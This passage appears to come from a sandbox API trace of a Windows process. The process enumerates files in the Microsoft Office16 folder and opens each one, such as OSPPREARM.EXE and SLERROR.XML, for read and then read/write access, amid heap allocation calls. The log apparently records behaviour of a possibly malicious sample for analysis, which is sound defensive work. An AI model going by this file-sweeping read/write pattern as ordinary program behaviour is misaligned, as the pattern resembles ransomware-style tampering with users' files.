ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9ea17a8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x17103)) returned 1 [0098.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0098.295] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.295] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.295] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x6a40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="OSPPREARM.EXE", cAlternateFileName="OSPPRE~1.EXE")) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0098.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0098.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0098.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0098.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.296] AreFileApisANSI () returned 1 [0098.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE", lpUsedDefaultChar=0x0) returned 57 [0098.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0098.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0098.296] AreFileApisANSI () returned 1 [0098.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a430 [0098.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 57 [0098.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\ospprearm.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.461] GetFileType (hFile=0x35c) returned 0x1 [0098.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0098.461] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.461] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.461] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.462] CloseHandle (hObject=0x35c) returned 1 [0098.462] AreFileApisANSI () returned 1 [0098.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0098.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 57 [0098.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\ospprearm.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.462] GetFileType (hFile=0x35c) returned 0x1 [0098.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0098.462] CloseHandle (hObject=0x35c) returned 1 [0098.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.464] AreFileApisANSI () returned 1 [0098.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0098.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE") returned 57 [0098.464] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPPREARM.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\ospprearm.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x6a40)) returned 1 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0098.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.464] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd502d600, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0xda9a8629, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd502d600, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x8df0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SLERROR.XML", cAlternateFileName="")) returned 1 [0098.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0098.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0098.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0098.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a498 [0098.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0098.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0098.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0098.465] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.465] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.465] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.465] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0098.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.465] AreFileApisANSI () returned 1 [0098.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML", lpUsedDefaultChar=0x0) returned 55 [0098.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0098.465] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.465] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0098.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.465] AreFileApisANSI () returned 1 [0098.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0098.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75be8 [0098.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 55 [0098.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.466] GetFileType (hFile=0x35c) returned 0x1 [0098.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.466] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.466] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.466] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.466] CloseHandle (hObject=0x35c) returned 1 [0098.467] AreFileApisANSI () returned 1 [0098.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0098.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x76110 [0098.467] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 55 [0098.467] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0098.467] GetFileType (hFile=0x35c) returned 0x1 [0098.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.467] CloseHandle (hObject=0x35c) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0098.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0098.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x20000, 